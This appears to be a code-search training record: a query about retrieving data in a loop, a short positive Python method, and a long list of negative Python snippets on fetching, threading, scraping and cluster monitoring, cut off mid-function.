[ "0.79571366", "0.72897905", "0.72555906", "0.72103953", "0.70631886", "0.7003551", "0.6984304", "0.6949121", "0.69234353", "0.69027823", "0.6886226", "0.6849591", "0.68323433", "0.67312163", "0.6725681", "0.67219126", "0.67061067", "0.6695192", "0.6695192", "0.6695192", "0.6650901", "0.66427946", "0.6623583", "0.6611583", "0.66026044", "0.65920943", "0.6572267", "0.6572267", "0.6560384", "0.6556241", "0.65547717", "0.65512", "0.65488905", "0.6547976", "0.65383875", "0.65383875", "0.65315455", "0.6515429", "0.64699835", "0.64699835", "0.64699835", "0.64699835", "0.64699835", "0.64699835", "0.64699835", "0.64699835", "0.64699835", "0.64699835", "0.64699835", "0.64699835", "0.64699835", "0.64699835", "0.64699835", "0.64699835", "0.64699835", "0.64699835", "0.64699835", "0.64699835", "0.64699835", "0.64699835", "0.64699835", "0.64699835", "0.6468892", "0.6468311", "0.6451013", "0.6451013", "0.6451013", "0.6441245", "0.64159465", "0.64115417", "0.64112896", "0.64074075", "0.6406501", "0.64040387", "0.63855577", "0.63778806", "0.6367143", "0.6357712", "0.6357712", "0.6357712", "0.6355548", "0.6343025", "0.6340898", "0.63288647", "0.6328085", "0.63232017", "0.6323201", "0.6320744", "0.631853", "0.63181204", "0.6315422", "0.6315422", "0.6313379", "0.6312854", "0.63036543", "0.6261145", "0.6255947", "0.6248634", "0.6243344", "0.6238525", "0.6236991" ]
0.0
-1
Retrieve data. Don't do long tasks in the loop. Use a separate thread so as not to perturb the nodeman
def loop(self, stopevent): for bus in self.buses: self.buses[bus].loop(stopevent)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_data_thread(self, ip):\n get_data_thread = Thread(target=self.get_data, args=[ip])\n get_data_thread.start()", "def fetch_data():\n data.fetch_data()\n data.start_updating()", "def main(self):\n while True:\n if not self.data_server_command.empty():\n command_data_server = self.data_server_command.get()\n if command_data_server[0] == 4:\n thread.start_new_thread(self.get_file, (command_data_server[1],))\n else:\n self.data_server_command_def[command_data_server[0]](command_data_server[1])", "def _receive_lymphocytes(self):\n getter_thread = GetterThread(self.nodes_manager.get_next_node_address(),\n self._set_lymphocytes_to_return)\n getter_thread.start()", "def run(self):\n while(not self.stop_event.is_set()):\n # read values until stop is sent\n response1 = _read_once(1,self.serial)\n response2 = _read_once(2,self.serial)\n #print(response)\n self.data1[\"d\"].append(response1) # Push response to the data list for later\n self.data2[\"d\"].append(response2) # Push response to the data list for later\n curTime = time.time()\n self.data1[\"t\"].append(curTime)\n self.data2[\"t\"].append(curTime)\n #sleep(0.0001) # I need to be small enough to capture peaks.\n return", "async def fetch_data(self) -> T:", "def fetch_data(self):", "def run(self):\n\n import time\n LOGGER.info(\"Caching thread started !\")\n\n while True:\n\n # Get all data\n # Make data visible from parent thread\n self.data = self._forge_data(self._sqla_session)\n\n # Wait 30 seconds before new processing\n time.sleep(cm.DELAY)", "def _fetch_data(self):\n pass", "def run(self):\n while True:\n if self.job_q.empty():\n self.message_q.put(False)\n return\n try:\n smolecule = self.job_q.get()\n self.data_pointer[smolecule].get_adp(self.Temp)\n except IndexError:\n self.message_q.put((smolecule, None))\n try:\n self.message_q.put((smolecule, [j.adp['cart_int'] for j in self.data_pointer[smolecule].atoms]))\n except KeyError:\n # =======================================================\n # self.message_q.put((molecule,[0 for i in self.data_pointer[molecule].atoms]))\n #=======================================================\n pass", "def main_loop(self):\n # main loop...don't ever exit\n while True:\n # collect data\n # get the time...the local clock is set with NTP regularly\n self._get_time()\n \n # get the latest metar data from the closest location\n self._get_metar()\n \n # get the latest fence station data\n self._get_fence_station()\n \n # get the lastest roof station data\n #METAR self._get_roof_station()\n \n # publish the data to our data file\n self.write_data_files()\n \n # show the user we are running\n print(\"{:s}\".format(datetime.datetime.now(pytz.UTC).strftime(\"%Y-%m-%d %H:%M:%S.%f\")), end=\"\\r\", flush=True)\n \n # wait a bit for the next loop\n time.sleep(3.0)\n \n return", "def run(self):\r\n self.collect_data()", "async def main():\n async with aiohttp.ClientSession() as session:\n data = Luftdaten(SENSOR_ID, loop, session)\n await data.get_data()\n\n if not await data.validate_sensor():\n print(\"Station is not available:\", data.sensor_id)\n return\n\n if data.values and data.meta:\n # Print the sensor values\n print(\"Sensor values:\", data.values)\n\n # Print the coordinates fo the sensor\n print(\"Location:\", data.meta['latitude'], data.meta['longitude'])", "def data_collection():\n global PAUSED\n print(\"Detecting nodes\")\n while True:\n data = SOCK.recvfrom(1024)[0] # buffer size is 1024 bytes\n message = data.decode()\n try:\n message_function = message[0]\n message = message[1:]\n \n 
if message_function == \"t\":\n loc, temp, hum = message.split(\", \")\n temp = (float(temp) * 1.8) + 32 # convert from C to F\n\n # Checks if location is alreay in the rolling_X dictionarys. If not, it creates an entry\n # in the dictionary and populates it with the defaults\n if loc not in ROLLING_TEMPS:\n ROLLING_TEMPS[loc] = copy(TEMPDEQUEDEFAULT)\n print(loc, \"has connected\")\n if loc not in ROLLING_HUMS:\n ROLLING_HUMS[loc] = copy(HUMDEQUEDEFAULT)\n\n # Append new temp and humidity to appropriate deque in dictionaries\n ROLLING_TEMPS[loc].appendleft(temp)\n ROLLING_HUMS[loc].appendleft(hum)\n LAST_RECEIVED[loc] = datetime.datetime.utcnow()\n \n elif message_function == \"c\":\n if message == \"pause\":\n PAUSED = True\n print(\"pausing\")\n elif message == \"unpause\":\n PAUSED = False\n print(\"unpausing\")\n else:\n print(\"unknown command function\")\n elif message_function == \"i\":\n if message == \"status\":\n print(\"Paused:\", PAUSED)\n else:\n print(\"unknown info function\")\n except:\n print(\"malformed data\")", "async def readrawdataTask():\n while 1:\n ## do some updating\n readrawdata()\n await asyncio.sleep(readperiod)", "def _obtain(self):\n\n while True:\n # make sure we're observing load maximums\n if self.max_load is not None:\n try:\n load = os.getloadavg()\n if jobserver_running_jobs() > 0 and load[1] > self.max_load:\n time.sleep(0.01)\n continue\n except NotImplementedError:\n pass\n\n # make sure we're observing memory maximum\n if self.max_mem is not None:\n mem_used, mem_total = memory_usage()\n mem_percent_used = 100.0 * float(mem_used) / float(mem_total)\n if jobserver_running_jobs() > 0 and mem_percent_used > self.max_mem:\n time.sleep(0.01)\n continue\n\n # get a token from the job pipe\n try:\n token = os.read(self.job_pipe[0], 1)\n return token\n except OSError as e:\n if e.errno != errno.EINTR:\n raise", "def run(self):\n # sends download range from offset to offset + block_size - 1 (including) in the header\n headers = {'User-Agent': self.user_agent, 'Refferer': '{}://{}/'.format(self.url.protocol, self.url.host), \n 'Range': 'bytes={}-{}'.format(self.offset, self.offset + self.block_size - 1)}\n status = 0 # set status to 0 that means a connection error\n try:\n self.conn.request('GET', self.url.request, headers=headers)\n response = self.conn.getresponse()\n # the server does not support partial downloading - error\n if response.status != 206:\n status = response.status\n raise MirrorError\n part_size = int(response.getheader('Content-Length')) # actual count of bytes sent by the server\n data = b'' # data buffer\n # loop while all data will be received\n while part_size > len(data):\n if self.cancelled.is_set(): # if the thread has been cancelled\n # stop the thread, the TaskError would not be processed\n # because a loop in the main thread already broken\n raise Exception\n data_fragment = response.read(self.FRAGMENT_SIZE)\n data += data_fragment # add data to the buffer\n # put progress information into the queue\n info = TaskProgress(self.url.host, response.status, len(data))\n self.data_queue.put(info)\n # when the downloading loop finished, create TaskData object\n info = TaskData(self.url.host, response.status, self.offset, data)\n response.close()\n except:\n # if an error has occurred - create a TaskError object\n info = TaskError(self.url.host, status, self.offset)\n finally:\n self.data_queue.put(info) # put result TaskInfo object into the queue\n self.ready.set() # mark the thread as comleted", "def get_data():\n pass", "def 
process_thread(self):", "def get_data(self):\n if self.random_seeds: \n self._validate_random_seeds()\n seed_iter = list(map(iter,self.random_seeds))\n nsamples = len(self.random_seeds[0])\n else:\n seed_iter = None\n nsamples = self.numsamples\n progress_bar = tqdm(range(nsamples))\n self._set_meta_features()\n task_dict = {}\n finished_tasks = 0\n for _ in range(min(nsamples,self.numworkers)): \n self._prepare_and_start_task(task_dict,seed_iter)\n while finished_tasks < nsamples: \n done_ids, pending_ids = ray.wait(list(task_dict.keys()))\n if done_ids:\n id = done_ids[0]\n finished_tasks += 1\n try:\n data, times, pid = ray.get(id)\n except Exception as exception:\n self.logger.info(\"task with id %s failed with Traceback:\" %task_dict[id], exc_info=True)\n raise exception\n times[-1] = time() # add getter time\n data['idx'] = task_dict.pop(id)\n self.logger.info('id %i on pid %i: finished task.' %(data['idx'],pid))\n self._log_execution_time(data['idx'], times, pid)\n if (nsamples - self._idx) > 0: # directly _schedule next task\n self._prepare_and_start_task(task_dict,seed_iter)\n progress_bar.update()\n yield data", "def run(self):\n data = ''\n while not rospy.is_shutdown():\n if (rospy.Time.now() - self.lastsync).to_sec() > (self.timeout * 3):\n rospy.logerr(\"Lost sync with device, restarting...\")\n self.requestTopics()\n self.lastsync = rospy.Time.now() \n \n flag = [0,0]\n flag[0] = self.port.read(1)\n if (flag[0] != '\\xff'):\n continue\n flag[1] = self.port.read(1)\n if ( flag[1] != '\\xff'):\n rospy.loginfo(\"Failed Packet Flags \")\n continue\n # topic id (2 bytes)\n header = self.port.read(4)\n if (len(header) != 4):\n #self.port.flushInput()\n continue\n \n topic_id, msg_length = struct.unpack(\"<hh\", header)\n msg = self.port.read(msg_length)\n if (len(msg) != msg_length):\n rospy.loginfo(\"Packet Failed : Failed to read msg data\")\n #self.port.flushInput()\n continue\n chk = self.port.read(1)\n checksum = sum(map(ord,header) ) + sum(map(ord, msg)) + ord(chk)\n\n if checksum%256 == 255:\n if topic_id == TopicInfo.ID_PUBLISHER:\n try:\n m = TopicInfo()\n m.deserialize(msg)\n self.senders[m.topic_id] = Publisher(m.topic_name, m.message_type)\n rospy.loginfo(\"Setup Publisher on %s [%s]\" % (m.topic_name, m.message_type) )\n except Exception as e:\n rospy.logerr(\"Failed to parse publisher: %s\", e)\n elif topic_id == TopicInfo.ID_SUBSCRIBER:\n try:\n m = TopicInfo()\n m.deserialize(msg)\n self.receivers[m.topic_name] = [m.topic_id, Subscriber(m.topic_name, m.message_type, self)]\n rospy.loginfo(\"Setup Subscriber on %s [%s]\" % (m.topic_name, m.message_type))\n except Exception as e:\n rospy.logerr(\"Failed to parse subscriber. 
%s\"%e)\n elif topic_id == TopicInfo.ID_SERVICE_SERVER:\n try:\n m = TopicInfo()\n m.deserialize(msg)\n\t\t\tservice = ServiceServer(m.topic_name, m.message_type, self)\n self.receivers[m.topic_name] = [m.topic_id, service]\n self.senders[m.topic_id] = service\n rospy.loginfo(\"Setup ServiceServer on %s [%s]\"%(m.topic_name, m.message_type) )\n except:\n rospy.logerr(\"Failed to parse service server\")\n elif topic_id == TopicInfo.ID_SERVICE_CLIENT:\n pass\n \n elif topic_id == TopicInfo.ID_PARAMETER_REQUEST:\n self.handleParameterRequest(msg)\n \n elif topic_id == TopicInfo.ID_LOG:\n self.handleLogging(msg)\n \n elif topic_id == TopicInfo.ID_TIME:\n t = Time()\n t.data = rospy.Time.now()\n data_buffer = StringIO.StringIO()\n t.serialize(data_buffer)\n self.send( TopicInfo.ID_TIME, data_buffer.getvalue() )\n self.lastsync = rospy.Time.now()\n elif topic_id >= 100: # TOPIC\n try:\n self.senders[topic_id].handlePacket(msg)\n except KeyError:\n rospy.logerr(\"Tried to publish before configured, topic id %d\" % topic_id)\n else:\n rospy.logerr(\"Unrecognized command topic!\")\n rospy.sleep(0.001)", "def run(self):\n while True:\n # Do something\n print('Doing something imporant in the background')\n\n self.loadData()\n time.sleep(self.interval)", "async def async_update_data():\n return await hass.async_add_executor_job(read_consumption, api, entry)", "def retrieve_data():\r\n\r\n print(\"\\n[i] Running scheduled query for page {} at {}.\".format(page, ut.get_time()))\r\n # Instanciating main class for Facebook call\r\n fbs = FacebookScrapper()\r\n\r\n # Getting hourly data from Facebook\r\n data = fbs.get_page_fan_count(page=page)\r\n\r\n # Sending data to database\r\n dba.insert_data_db(data)", "def run(self):\n\n # TODO: Logic to get data, enforce request limits, and filter out duplicates", "def read(self):\n\n self.log.debug('Beginning read callback')\n info = self.poll()\n\n if not info:\n self.log.warn('No data received')\n return\n\n def dispatch_host(name, data):\n \"\"\"\n Helper to reduce duplication\n\n \"\"\"\n\n for key, value in data.items():\n self.dispatch(name, 'host_%s' % (key,), name, value)\n\n # report information for all vCenter servers\n for vcenter, data in info.items():\n # report datastore information\n for ds_name, ds_data in data['datastore'].items():\n for key, value in ds_data.items():\n self.dispatch(vcenter, 'ds_%s' % (key,), ds_name, value)\n\n # report datacenter information\n for dc_name, dc_data in data['datacenter'].items():\n # extract any cluster and host information for later processing\n clusters = dc_data.pop('cluster', {})\n hosts = dc_data.pop('host', {})\n\n for key, value in dc_data.items():\n self.dispatch(vcenter, 'dc_%s' % (key,), dc_name, value)\n\n # report cluster information\n for c_name, c_data in clusters.items():\n c_hosts = c_data.pop('host', {})\n\n for key, value in c_data.items():\n o_type = 'cluster_%s' % (key,)\n self.dispatch(dc_name, o_type, c_name, value)\n\n for ch_name, ch_data in c_hosts.items():\n dispatch_host(ch_name, ch_data)\n\n # report host information\n for h_name, h_data in hosts.items():\n dispatch_host(h_name, h_data)\n\n time.sleep(self.sleep_time)", "def run(self):\n results = self.fetch()\n return results", "def get_data():\n pass", "def get_data():\n pass", "def get_data():\n pass", "async def _fetch_data(self) -> T:\n raise NotImplementedError", "def fetch_data(swarming, start, end, state, tags):\n # Split the work in days. 
That's a lot of requests to do.\n queue = Queue.Queue()\n threads = []\n def run(start, cmd):\n data = json.loads(subprocess.check_output(cmd))\n queue.put((start, int(data['count'])))\n\n day = start\n while day != end:\n data = [\n ('start', int((day - _EPOCH).total_seconds())),\n ('end', int((day + datetime.timedelta(days=1)-_EPOCH).total_seconds())),\n ('state', state),\n ]\n for tag in tags:\n data.append(('tags', tag))\n cmd = [\n sys.executable, os.path.join(CLIENT_DIR, 'swarming.py'),\n 'query', '-S', swarming, 'tasks/count?' + urllib.urlencode(data),\n ]\n thread = threading.Thread(target=run, args=(day.strftime('%Y-%m-%d'), cmd))\n thread.daemon = True\n thread.start()\n threads.append(thread)\n while len(threads) > 100:\n # Throttle a bit.\n for i, thread in enumerate(threads):\n if not thread.is_alive():\n thread.join()\n threads.pop(i)\n sys.stdout.write('.')\n sys.stdout.flush()\n break\n day = day + datetime.timedelta(days=1)\n\n while threads:\n # Throttle a bit.\n for i, thread in enumerate(threads):\n if not thread.is_alive():\n thread.join()\n threads.pop(i)\n sys.stdout.write('.')\n sys.stdout.flush()\n break\n print('')\n data = []\n while True:\n try:\n data.append(queue.get_nowait())\n except Queue.Empty:\n break\n return dict(data)", "def get_data(self):\n has_next_page = True\n page = 1\n while has_next_page:\n print(f'Getting page {page}')\n response = self.get_articles(\n page=page,\n size=200,\n order_by='extracted_at',\n order_type='asc'\n )\n pagination = response.get('pagination')\n has_next_page = pagination.get('has_next')\n self.save_articles(response.get('articles'))\n page += 1\n time.sleep(2.5)", "def requestDataFromServer(self):\r\n self.tempVar = None\r\n dataAvailable = threading.Event()\r\n\r\n self.sendMessage(\"requestData\", \"\")\r\n\r\n @self.ursinaClient.event\r\n def receiveData(Content):\r\n self.ursinaClient.lock.acquire()\r\n\r\n self.tempVar = Content\r\n dataAvailable.set()\r\n\r\n self.ursinaClient.lock.release()\r\n\r\n # print(\"Len Data Recvd: \", len(Content))\r\n\r\n dataAvailable.wait()\r\n\r\n tempVar = self.tempVar\r\n\r\n del self.tempVar\r\n return tempVar", "def run(self):\n while True:\n req = self._requests.get()[1]\n req.start()\n logging.info('Running request %s', req)", "def receive_data():\n\n while True:\n try:\n bytes_to_read = ser.readline()\n print(bytes_to_read)\n data = json.loads(bytes_to_read.decode('utf-8'))\n distance = data['distance']\n print(f'distance: {distance}')\n except Exception as e:\n print(f'Error in reading bytes from the \\'duino: {e}')", "def do_fetch(self):\n pass", "def main():\n output_queue = Queue()\n\n out_list = list()\n\n logging.info('Retrieving news...')\n download = DownloadNewsWorker(output_queue)\n download.retrieve_news()\n\n while not output_queue.empty():\n item = output_queue.get()\n out_list.append(item)\n\n return out_list", "def worker_run():\n while True:\n print(\"worker: waiting for numdata_lock\")\n numdata_lock.acquire()\n print(\"worker: acquired numdata_lock\")\n print(\"The number {} is spelled '{}'\".format(numdata[\"int\"],numdata[\"name\"]))\n numdata_lock.release()\n time.sleep(1)", "def run(self):\n super().run()\n echo = self.echo\n local = self.local\n remote = self.remote\n transport = Transceiver(local)\n transport.set_timeout(0.5)\n self.__result: list[Entry] = []\n\n while True:\n try:\n packet = transport.recv(None)\n params = frame.deserialize(packet)\n seq = params[\"seq\"]\n total = params[\"total\"]\n t_master = params[\"t_master\"]\n infinite = 
params[\"infinite\"]\n payload = params[\"payload\"]\n\n t_slave = time.time()\n if echo:\n data_send = frame.serialize(infinite, seq, total, t_master, t_slave, payload)\n transport.send(remote, data_send)\n t_ul = (t_slave - t_master) * 1000\n self.add_result(Entry(seq, total, t_ul, 0))\n print(f\"seq = {seq}, ul = {t_ul:.2f} ms, payload: {hex_str(payload)}\")\n if frame.is_end(params):\n print(f\"receive last packet!\")\n break\n except socket.timeout:\n continue\n except KeyboardInterrupt:\n break", "def task():", "def run(self):\n print(\"%s starting up\" % self.getName())\n for count in range(self.accessCount):\n time.sleep(random.randint(1, self.sleepMax))\n value = self.cell.read(lambda counter: self.cell.data.count)\n print(\"%s is done getting %s\" % (self.getName(), str(value)))", "def run(self):\n while True: # make sure to run at least once before exiting\n with self._lock:\n self._update(self._data)\n if self._done:\n break\n time.sleep(1)", "def get_info():\n with open('explorers.json', 'r') as file:\n block_expl_info = json.load(file)\n BLOCK_EXPL_INFO['block_explorers'] = [{'analytics': [None, None]} for i in range(len(block_expl_info))]\n analytic_thread = threading.Thread(target=get_analytics)\n analytic_thread.start()\n print(analytic_thread)\n counter_api = 0\n for elem in block_expl_info:\n print(counter_api, elem)\n api = search(block_expl_info[elem], \"api\")\n name, currency, url, best_height_key, timer = search(block_expl_info[elem], \"name\"), search(\n block_expl_info[elem], \"currency\"), search(block_expl_info[elem], \"url\"), search(block_expl_info[elem],\n \"best_height_key\"), search(\n block_expl_info[elem], \"api_limit\")\n if api:\n my_thread = threading.Thread(target=get_best_height,\n args=(name, currency, url, best_height_key, counter_api, timer))\n counter_api += 1\n my_thread.start()\n print(my_thread)\n else:\n latest_block = BLOCK_EXPL_INFO\n latest_block_list = latest_block['block_explorers']\n latest_block_list[counter_api][\"name\"] = name\n latest_block_list[counter_api][\"currency\"] = currency\n latest_block_list[counter_api][\"best_height\"] = best_height_key\n latest_block_list[counter_api][\"api\"] = None\n counter_api += 1", "def run(self, data):\n\t\t# no processing here\n\t\treturn data", "def data(self):\n\t\tself.dworker()\n\t\treturn self.d", "def run(self):\n while True :\n try:\n appinfo = self.db.hgetall(self.appname)\n appinfo_str = json.dumps(appinfo)\n data = {'applicationname':self.appname,'appinfo':appinfo_str}\n response = requests.post(REGISTRAR_URL, data=data)\n time.sleep(2)\n except :\n pass", "def run(self):\n receiver = threading.Thread(target=self.receive_data)\n # Setting daemon to True means that this Thread will be terminated when the main program ends.\n receiver.daemon = True\n receiver.start()", "def run(self):\n self._started = True # Only set once to true!\n self.gui_block.set() # Unblocked by the GUI\n time.sleep(self.delay) # Should collect data before sending it\n while self._started:\n # If the application has been stopped, wait until it is unblocked\n if not self.gui_block.is_set():\n self.gui_block.wait()\n else:\n # The retriever thread is put into pause, and we wait until it\n # is actually paused. Then, we try to send the data. 
Finally, we\n # wake up the data retrieving thread back again.\n self.retriever.resume.clear()\n self.retriever.is_waiting.wait()\n self.send_data()\n self.retriever.resume.set()\n time.sleep(self.delay)", "async def _fetch_data(self) -> JobInfo:\n return await self.api.get_job()", "def collect_data(endless):\r\n click.echo(\"start collecting data ...\")\r\n _collect_data(endless)", "def GetData(self):\r\n if self.Error == False:\r\n Extra = {}\r\n try:\r\n result = {}\r\n temp = self.ScrapeMainWebpage()\r\n if temp != None:\r\n result.update(temp)\r\n temp = self.ScrapeParameters1Webpage()\r\n if temp != None:\r\n result.update(temp)\r\n temp = self.ScrapeParameters2Webpage()\r\n if temp != None:\r\n result.update(temp)\r\n temp = self.ScrapeStatusWebpage()\r\n if temp != None:\r\n result.update(temp)\r\n sqlArray = {}\r\n sqlArray[self.deviceDescr] = {}\r\n sqlArray[self.deviceDescr][self.devNumber] = {}\r\n sqlArray[self.deviceDescr][self.devNumber][\"General\"] = result\r\n sqlArray[self.deviceDescr][self.devNumber][\"_ExtractInfo\"] = {}\r\n sqlArray[self.deviceDescr][self.devNumber][\"_ExtractInfo\"][\"ExtractTime\"] = time.time()\r\n sqlArray[\"ReadError\"] = False \r\n return sqlArray\r\n \r\n except Exception as e: \r\n self.log.printError(\"ERROR in Retreiving Seatel VSAT Data,%s Module Error\" % sys._getframe().f_code.co_name) \r\n self.log.printError( str(e))\r\n self.Error = True\r\n Extra[\"ReadError\"] = True\r\n return Extra\r\n else:\r\n self.log.printWarning(\"%s skipped due to previous failure\" % sys._getframe().f_code.co_name)\r\n return None", "def _get_data(self):\n while True:\n # self.logger.debug(\"data queue size is: {}\".format(len(self._dataqueue)))\n ans = self._parser.find_first_packet(self._dataqueue[:])\n if ans:\n self._dataqueue = ans[1]\n # self.logger.debug(\"found packet of size {}\".format(len(ans[0])))\n return ans[0]\n else:\n # self.logger.debug(\"Could not find packet in received data\")\n tmp = self.conn.recv(1024)\n self._dataqueue += tmp", "def fetch(thread=False):\r\n if thread:\r\n Fetch.start()\r\n else:\r\n urlretrieve(OBSURL,ZFILE)", "def run(self):\n while True:\n letter = self.queue.get()\n course_scraper = CourseSession(self.location)\n course_scraper.scrape(letter)\n self.queue.task_done()", "def get_data():\n log = common.LogFile('', LOGFILE)\n settings = load_settings()\n keywords = settings[\"keywords\"]\n api_key = settings[\"api_key\"]\n for keyword in keywords:\n print(\"[{}] : fetching data.\".format(keyword))\n filename = \"results_{0}.json\".format(keyword)\n results = {}\n hits_limit = 500\n start_at = 1\n counter = 0\n while True:\n url = create_url(keyword, hits_limit, start_at, api_key)\n records = get_records_from_url(url)\n total_results = get_total_hits(records)\n records = split_records(records)\n records_on_page = len(records)\n if records_on_page == 0:\n break\n else:\n for record in records:\n counter += 1\n id_no = extract_id_number(record)\n processed_dict = {'ID': id_no, 'problem': []}\n processed_record = parse_record(\n record, processed_dict, log)\n if id_no not in results:\n results[id_no] = processed_record\n if counter % 100 == 0:\n print(\"Processed {} out of {}\".format(\n counter, total_results))\n start_at += hits_limit\n time.sleep(THROTTLE)\n print(\"[{}] : fetched {} records to {}.\".format(\n keyword, len(results), filename))\n save_data(results, filename)", "def get_data():\n return", "def getData(tme=currentTime):\n # attempts request 10 times\n for attempt in range(10):\n try:\n # make a request 
to the url and return it in json format\n url = \"https://api.darksky.net/forecast/%s/%s,%s,%s?exclude=minutely,hourly,daily,alerts,flags\" % (API_KEY, LAT, LNG, tme)\n return get(url).json()\n except:\n # Wait .05 seconds and try again\n sleep(.05)\n pass", "def run(self):\n while self.running:\n self.handle_request()", "def poller():\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n\n output = loop.run_until_complete(get_results(loop))\n o = open('data.pkl', 'wb')\n\n pickle.dump(output, o)", "def fetch_data(args):\n logger.debug(\"Running the fetch_data function\")\n\n #Loading the config\n with open(os.path.join(\"Config\",\"config.yml\"), \"r\") as f:\n config = yaml.safe_load(f)\n\n #Starting the scraping process\n tstart = datetime.datetime.now()\n err_count = 0\n\n logger.info(\"Starting web scraping now.\")\n for i in range(config[\"fetch_data\"][\"indices\"][\"start\"], config[\"fetch_data\"][\"indices\"][\"end\"]+1):\n try:\n time.sleep(1)\n req_link1 = \"http://www.gutenberg.org/cache/epub/\" + str(i) + \"/pg\" + str(i) + \".txt\"\n response1 = requests.get(req_link1)\n \n req_link2 = \"http://www.gutenberg.org/files/\" + str(i) + \"/\" + str(i) + \"-0.txt\"\n response2 = requests.get(req_link2)\n \n response1.encoding = \"UTF-8\"\n response2.encoding = \"UTF-8\"\n \n if response1.status_code == 200:\n with open(config[\"fetch_data\"][\"save_location\"] + str(i) + \".txt\", \"w\", encoding=\"UTF-8\") as text_file:\n text_file.write(response1.text)\n \n elif response2.status_code == 200:\n with open(config[\"fetch_data\"][\"save_location\"] + str(i) + \".txt\", \"w\", encoding=\"UTF-8\") as text_file:\n text_file.write(response2.text)\n \n else:\n err_count = err_count + 1 \n logger.error(\"Status Code {} returned for index {}\".format(response.status_code, i))\n \n if i % 500 == 0:\n time.sleep(30)\n logger.info(\"At Index {}. 
Time Elapsed: {}\".format(i, datetime.datetime.now()-tstart)) \n\n except Exception as e:\n logger.error(e)\n \n logger.info(\"Total Errorred documents: {}\".format(err_count))\n logger.info(\"Total Successful documents: {}\".format(config[\"fetch_data\"][\"indices\"][\"end\"] - config[\"fetch_data\"][\"indices\"][\"start\"] + 1 -err_count))\n logger.info(\"Total Time taken: {}\".format(datetime.datetime.now()-tstart))\n\n return", "def _read_thread(self):\r\n\r\n while self._reading and self._serial_object:\r\n if self._serial_object.in_waiting:\r\n try:\r\n (raw_data, parsed_data) = self._ubxreader.read()\r\n # if raw_data:\r\n # print(raw_data)\r\n if parsed_data:\r\n print(parsed_data)\r\n except (\r\n ube.UBXStreamError,\r\n ube.UBXMessageError,\r\n ube.UBXTypeError,\r\n ube.UBXParseError,\r\n ) as err:\r\n print(f\"Something went wrong {err}\")\r\n continue", "def DataServer(data):\n\thttpd, t, baseURL = getServerInThread(data)\n\n\tyield baseURL\n\n\thttpd.shutdown()\n\tt.join(10)", "def startworking():\r\n #In the future have the manager program or from the website implement this arguments to a route\r\n #the program will download the file from the website\r\n global exe_name\r\n global Task_Conditional\r\n task_data = None\r\n while task_data is None:\r\n task_data = recieve_data_from_server(\"get_task\")\r\n if task_data is None:\r\n time.sleep(5)\r\n else:\r\n exe_name = task_data[\"exe_name\"]\r\n print('Working on the task \"{}\"'.format(exe_name))\r\n get_file(exe_name)\r\n Task_Conditional = task_data[\"Task_conditional\"]\r\n print(\"loading\")\r\n t1 = time.time()\r\n task_divider(task_data[\"first_num\"], task_data[\"last_num\"])\r\n t2 = time.time()\r\n print(\"ready {}\".format(t2-t1))", "def cli():\n while True:\n try:\n # Get the whole information on each edge.\n l_edge = list()\n s_rsc = '{}/edge'.format(etcdc.prefix)\n \n try:\n r = etcdc.read(s_rsc, recursive=True)\n except etcd.EtcdKeyNotFound as e:\n log.error(e)\n else:\n for child in r.children:\n l_app = list()\n d = ast.literal_eval(child.value)\n # get hosts\n print(PROJECT_ROOT + '/' + d['endpoint'])\n l_hosts = kube_list_node(PROJECT_ROOT + '/' + d['endpoint'])\n d['hosts'] = len(l_hosts)\n d_nodes = dict() # {'name': 'ip', ...}\n for item in l_hosts:\n d_nodes[item.metadata.name] = item.status.addresses[0].address\n # log.debug(d_nodes)\n # get # of tenants and apps\n l_tenants = get_tenant(d['name'])\n d['tenants'] = len(l_tenants)\n d['apps'] = 0\n for e in l_tenants:\n if 'app' in e:\n d['apps'] += len(e['app'])\n \n d['cpu'] = 0\n d['memory'] = 0\n i_total_cores = 0\n i_total_memory = 0\n i_total_storage = 0\n for h in l_hosts:\n i_total_cores += int(h.status.capacity['cpu'])\n i_total_memory += int(h.status.capacity['memory'].\n replace('Ki', ''))\n d['tot_cpu'] = i_total_cores\n d['tot_mem'] = int(i_total_memory / (1024*1024))\n \n # Get loadavg and free mem\n if d['name'] == 'edge1':\n ssh_server = 'harden.iorchard.co.kr'\n elif d['name'] == 'edge2':\n ssh_server = 'durant.iorchard.co.kr'\n RSC = 'ssh -p42544 {} get_rsc.sh'.format(ssh_server)\n (b_res, s_out) = cmd(RSC, 3, False)\n l = s_out.split(\"\\n\")\n d['used_cpu'] = (float(l[0]) + float(l[1]) + float(l[2]))\n avail_mem = (int(l[3]) + int(l[4]) + int(l[5])) / (1024*1024)\n d['used_mem'] = d['tot_mem'] - avail_mem\n d['cpu'] = int(d['used_cpu'] / d['tot_cpu'] * 100)\n d['memory'] = int(d['used_mem'] / d['tot_mem'] * 100)\n # ceph storage\n CEPH = \"kubectl --kubeconfig \" + PROJECT_ROOT + '/' \\\n + d['endpoint'] + \" -n rook-ceph exec -it \" 
\\\n + \"$(kubectl --kubeconfig \" + PROJECT_ROOT + '/' \\\n + d['endpoint'] + \" -n rook-ceph get po \" \\\n + \"-l app=rook-ceph-tools \" \\\n + \"-o jsonpath='{.items[0].metadata.name}') -- \" \\\n + \"ceph df --format json\"\n (b_res, s_out) = cmd(CEPH, 3, False)\n print(s_out)\n d['status'] = 'Healthy' if b_res else 'Unhealthy'\n d_stor = ast.literal_eval(s_out)\n d['tot_stor'] = int(d_stor['stats']['total_bytes'] / pow(1024, 3))\n d['used_stor'] = int(d_stor['stats']['total_used_bytes'] / pow(1024, 3))\n d['storage'] = int(d['used_stor'] / d['tot_stor'] * 100)\n # Update etcd status\n try:\n s = '{}/edge/{}'.format(etcdc.prefix,\n d['name'])\n # log.debug(d)\n etcdc.write(s, d, prevExist=True)\n except etcd.EtcdKeyNotFound as e:\n log.error(e)\n \n # Update app status\n s_app = '{}/app'.format(etcdc.prefix)\n try:\n r_app = etcdc.read(s_app, recursive=True)\n except etcd.EtcdKeyNotFound as e:\n log.error(e)\n else:\n for app_child in r_app.children:\n if app_child.value is not None:\n d_app = dict()\n app = ast.literal_eval(app_child.value)\n if app['edge'] == d['name']:\n d_app['name'] = app['name']\n d_app['username'] = GUAC_USER\n d_app['password'] = GUAC_PASS\n # Get catalog info.\n s_cat = '{}/catalog/{}'.format(etcdc.prefix,\n app['catalog'])\n try:\n r_cat = etcdc.read(s_cat)\n except etcd.EtcdKeyNotFound as e:\n log.error(e)\n else:\n cat = ast.literal_eval(r_cat.value)\n app['cat_type'] = cat['type']\n app['cat_name'] = 